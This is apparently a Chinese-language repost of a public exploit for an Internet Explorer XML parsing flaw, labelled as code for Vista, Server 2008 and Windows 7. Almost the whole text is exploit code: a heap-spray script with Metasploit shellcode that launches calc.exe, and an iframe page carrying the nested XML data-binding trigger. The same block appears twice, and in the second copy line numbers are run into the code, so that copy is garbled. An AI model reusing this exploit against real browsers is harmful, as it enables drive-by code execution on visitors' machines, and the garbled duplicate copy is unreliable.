適用於VISTA操做系統的代碼(VISTA/SERVER 2008/WINDOWS 7):
1
1.
<
html
>
2 2.
<
script
>
3 3.
4 4. // k`sOSe 12/10/2008
5 5. // Tested on Vista SP1, Explorer 7.0.6001.18000 and Vista SP0, Explorer 7.0.6000.16386
6 6. // Heap spray address adjusted for Vista - muts / offensive-security.com
7 7. // [url]http://secmaniac.blogspot.com/2008/12/ms-internet-explorer-xml-parsing-remote.html[/url]
8 8. // [url]http://www.offensive-security.com/0day/iesploit-vista.rar[/url]
9 9. // windows/exec - 141 bytes
10 10. // [url]http://www.metasploit.com [/url]
11 11. // EXITFUNC=seh, CMD=C:\WINDOWS\system32\calc.exe
12 12. var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u735c%u7379%u6574%u336d%u5c32%u6163%u636c%u652e%u6578%u4100");
13 13. var block = unescape("%u0c0c%u0c0c");
14 14. var nops = unescape("%u9090%u9090%u9090");
15 15.
16 16.
17 17. while (block.length < 81920) block += block;
18 18. var memory = new Array();
19 19. var i=0;
20 20. for (;i<1000;i++) memory[i] += (block + nops + shellcode);
21 21.
22 22. document.write("<iframe src=\"iframe.html\">");
23 23.
24 24.
</
script
>
25 25.
26 26.
27 27.
</
html
>
28 28.
29 29.
30 30.
<!--
iframe.html
31 31.
32 32. <XML ID=I>
33 33. <X>
34 34. <C>
35 35. <![CDATA[
36 36. <p_w_picpath
37 37. SRC=http://ఌఌ.xxxxx.org
38 38. >
39 39. ]]>
40 40.
41 41. </C>
42 42. </X>
43 43. </XML>
44 44.
45 45. <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
46 46. <XML ID=I>
47 47. </XML>
48 48.
49 49. <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
50 50. </SPAN>
51 51. </SPAN>
52 52.
53 53.
-->
54
1.
<
html
>
2
2.
<
script
>
3
3. 4
4. // k`sOSe 12/10/20085
5. // Tested on Vista SP1, Explorer 7.0.6001.18000 and Vista SP0, Explorer 7.0.6000.163866
6. // Heap spray address adjusted for Vista - muts / offensive-security.com7
7. // [url]http://secmaniac.blogspot.com/2008/12/ms-internet-explorer-xml-parsing-remote.html[/url]8
8. // [url]http://www.offensive-security.com/0day/iesploit-vista.rar[/url]9
9. // windows/exec - 141 bytes10
10. // [url]http://www.metasploit.com [/url]11
11. // EXITFUNC=seh, CMD=C:\WINDOWS\system32\calc.exe 12
12. var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u735c%u7379%u6574%u336d%u5c32%u6163%u636c%u652e%u6578%u4100");13
13. var block = unescape("%u0c0c%u0c0c");14
14. var nops = unescape("%u9090%u9090%u9090");15
15. 16
16. 17
17. while (block.length < 81920) block += block;18
18. var memory = new Array();19
19. var i=0;20
20. for (;i<1000;i++) memory[i] += (block + nops + shellcode);21
21. 22
22. document.write("<iframe src=\"iframe.html\">");23
23. 24
24.
</
script
>
25
25. 26
26. 27
27.
</
html
>
28
28. 29
29. 30
30.
<!--
iframe.html31
31. 32
32. <XML ID=I>33
33. <X>34
34. <C>35
35. <![CDATA[36
36. <p_w_picpath 37
37. SRC=http://ఌఌ.xxxxx.org 38
38. >39
39. ]]>40
40. 41
41. </C>42
42. </X>43
43. </XML>44
44. 45
45. <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>46
46. <XML ID=I>47
47. </XML>48
48. 49
49. <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>50
50. </SPAN>51
51. </SPAN>52
52. 53
53.
-->
54